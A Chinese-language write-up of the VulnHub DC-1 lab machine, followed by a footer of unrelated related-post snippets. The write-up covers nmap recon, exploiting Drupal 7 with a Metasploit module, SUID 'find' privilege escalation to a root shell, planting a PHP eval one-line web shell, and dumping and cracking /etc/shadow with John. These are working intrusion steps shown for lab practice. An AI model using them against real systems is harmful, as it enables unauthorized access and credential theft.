渗透测试全流程靶机vulnhubDC-1完成笔记
镜像下载地址
https://www.vulnhub.com/entry/dc-1-1,292/
信息收集
1、可以使用netdiscover -i eth0 发现二层网络信息
发现两个设备(103是真实机)。其中105为目标机器。
2、端口发现
Nmap -A 192.168.1.105
发现三个端口 22 80 111
80为http则直接浏览器访问
3、web指纹发现
发现Drupal 版本为 7
准备web渗透
因为7版本存在漏洞 而且在msf中也有
Drupal漏洞
在网上找了一圈没找到可getshell的exp,因为msf里面有集成cms的利用模块,所以使用msf进行getshell,用search命令搜索,发现7个漏洞模块,这里我随便选择了一个(use 2)
Show option 只需要填写RHOSTS
Set RHOSTS 192.168.1.105
Run
获取shell与与提权
因为仅仅是一个session 所以无法whoami 直接使用getuid
提权方法--查找具有root权限的命令进行提权
发现是 www-data用户。那么就需要提权
首先需要有session切换成shell
然后查找具有suid的文件,让这些文件来执行命令进行提权
Find / -perm -u=s -ype f 2>dev.null
发现find命令具有root权限,那就touch一个1 用find提权
使用find 1 -exec ‘/bin/sh’ \;
进入高权限shell
然后再写个一句话木马方便链接
find 1 -exec echo '<?php eval($_GET[a]);'>123.php \;
这里使用单引号包含需要写入的内容。放置$_GET被转义
重新写下find 1 -exec echo '<?php eval($_POST[a]);'>123.php \;
内网信息获取
1、百度查找该CMS配置,可以找到配置文件路径。发现如下信息
2、这个不用看,数据库肯定不能远程链接, 直接蚁剑链接数据库
登陆即可产看到flag3
3、密码获取
cat /etc/shadow
使用join爆破一下
find /etc/shadow -exec cat {} ;>all,txt 导入到当前txt中,用蚁剑下载下来
john --wordlist=/usr/share/john/password.lst --rules all.txt 使用johun爆破一下password.list为默认密码
登陆之后更目录下获取flag4
根据提示使用find flag4.txt -exec ‘/bin/sh’ ;切换到root权限
根据提示进入/root
发现最后的flag
渗透测试全流程靶机vulnhubDC-1完成笔记的更多相关文章
- 基于Jenkins的开发测试全流程持续集成实践
今年一直在公司实践CI,本文将近半年来的一些实践总结一下,可能不太完善或优美,但的确初步解决了我目前所在项目组的一些痛点.当然这仅是一家之言也不够完整,后续还会深入实践和引入Kubernetes进行容 ...
- 《metasploit渗透测试魔鬼训练营》靶机演练之第五章实战案例KingView 6.53版本CVE-2011-0406漏洞
在一个笔记本上开两个虚拟机有点卡,而且太麻烦,就把metasploit的目标靶机放在别的机器上了,ip自己配置了一下, 目标主机:192.168.137.254 入侵机:192.168.137.253 ...
- 2019-9-18:渗透测试,基础学习,DNS HTML,笔记
DNS服务器,域名解析服务器,端口默认53,UDP协议传输,服务器作业,将域名转成ip,将ip转成域名 sql server默认端口:1433,MSSQL是sql server简写 netstat - ...
- 2019-9-11:渗透测试,基础学习,vim编辑器,笔记
Linux快捷路径符号说明. 代表当前目录.. 上级目录- 代表前一个工作目录~ 表示当前用户的家目录 vmware tools 用来虚拟机和宿主机之间移动数据 vim/vi编辑器vim编辑器三种模式 ...
- 《Metasploit渗透测试魔鬼训练营》第一章读书笔记
第1章 魔鬼训练营--初识Metasploit 20135301 1.1 什么是渗透测试 1.1.1 渗透测试的起源与定义 如果大家对军事感兴趣,会知道各国军队每年都会组织一些军事演习来锻炼军队的攻防 ...
- (一)走进Metasploit渗透测试框架
渗透测试的流程 渗透测试是一种有目的性的,针对目标机构计算机系统安全的检测评估方法,渗透测试的主要目的是改善目标机构的安全性.渗透测试各个阶段的基本工作: 1.前期交互阶段 在这个阶段,渗透测试工程师 ...
- kali Linux渗透测试技术详解
kali Linux渗透测试技术详解 下载:https://pan.baidu.com/s/1g7dTFfzFRtPDmMiEsrZDkQ 提取码:p23d <Kali Linux渗透测试技术详 ...
- 2017-2018-2 20179204 PYTHON黑帽子 黑客与渗透测试编程之道
python代码见码云:20179204_gege 参考博客Python黑帽子--黑客与渗透测试编程之道.关于<Python黑帽子:黑客与渗透测试编程之道>的学习笔记 第2章 网络基础 t ...
- DC-9 靶机渗透测试
DC-9 渗透测试 冲冲冲,好好学习 DC系列的9个靶机做完了,对渗透流程基本掌握,但是实战中出现的情况千千万万,需要用到的知识面太广了,学不可以已. 靶机IP: 172.66.66.139 kali ...
随机推荐
- mysql-6-groupby
#进阶5:分组查询 /* SELECT FROM WHERE GROUP BY ORDER BY 查询列表要求是分组函数和 group by 之后出现的字段 1.筛选条件分为两类: 数据源 位置 关键 ...
- Java安全之URLDNS链
Java安全之URLDNS链 0x00 前言 在学习Java的反序列化漏洞的时候,就不得不学习他的一个利用链.很多刚刚入门的对于利用链这个词可能比较陌生.那么这里先来了解一下Java反序列化和反序列化 ...
- 我把这个贼好用的Excel导出工具开源了!!
写在前面 不管是传统软件企业还是互联网企业,不管是管理软件还是面向C端的互联网应用.都不可避免的会涉及到报表操作,而对于报表业务来说,一个很重要的功能就是将数据导出到Excel.如果我们在业务代码中, ...
- Java知识系统回顾整理01基础03变量04类型转换
一.不同类型之间的数据可以互相转换,但是要满足一定的规则 二.数据类型转换规则 转换规则如图所示 精度高的数据类型就像容量大的杯子,可以放更大的数据 精度低的数据类型就像容量小的杯子,只能放更小的数 ...
- ansible-介绍
常用自动化运维工具 CFengine Chef Puppet 基于Ruby开发,采用C/S架构,扩展性强,基于SSL认证 SaltStack 基于python开发,采用C/S架构,相对于puppet更 ...
- Spark 单机环境配置
概要 Spark 单机环境配置 JDK 环境配置 Spark 环境配置 python 环境配置 Spark 使用示例 示例代码 (order_stat.py) 测试用的 csv 文件内容 (order ...
- GDB将所有线程堆栈输出到文件
在调试多线程程序时,经常需要查看线程堆栈信息,如果线程数目过多,每次查看一个线程堆栈,繁琐耗时.下面介绍一种一次性将所有线程堆栈输出到文件的方法. 首先,将gdb attach到调试线程 gdb -p ...
- 面经手册 · 第13篇《除了JDK、CGLIB,还有3种类代理方式?面试又卡住!》
作者:小傅哥 博客:https://bugstack.cn 沉淀.分享.成长,让自己和他人都能有所收获! 一.前言 编程学习,先铺宽度还是挖深度? 其实技术宽度与技术深度是相辅相成的,你能了解多少技术 ...
- Hudi on Flink在顺丰的实践应用
获取PDF版本 请关注"实时流式计算" 后台回复 "flink1015"
- MeteoInfoLab脚本示例:多Y轴图
数据范围相差比较大的数据序列进行对比的时候多Y轴图就很重要了.MeteoInfoLab中提供了一个twinx函数来根据已有的坐标系(Axes)生成一个新的Axes,这个命令会使得已有的Axes不绘制右 ...